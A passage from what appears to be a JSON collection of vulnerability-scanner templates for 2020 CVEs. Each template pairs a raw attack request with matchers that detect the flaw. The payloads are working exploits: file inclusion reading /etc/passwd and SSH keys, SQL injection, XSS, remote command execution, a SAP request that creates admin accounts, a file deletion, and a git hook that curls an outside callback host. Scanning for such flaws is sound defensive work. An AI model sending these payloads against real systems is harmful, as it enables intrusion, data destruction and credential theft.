Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-28976","info":{"name":"WordPress Canto 1.3.0 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}","{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["null"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","<strong>IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24148","info":{"name":"Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"],"body":"type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12127","info":{"name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7318","info":{"name":"McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Policy Name","'\"><svg/onload=alert(document.domain)>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5405","info":{"name":"Spring Cloud Config - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-5191","info":{"name":"PHPGurukul Hospital Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /hospital/hms/admin/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&submit=&submit=\n","POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndoctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td class=\"hidden-xs\"></td><script>alert(document.domain);</script><td>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15227","info":{"name":"Nette Framework - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 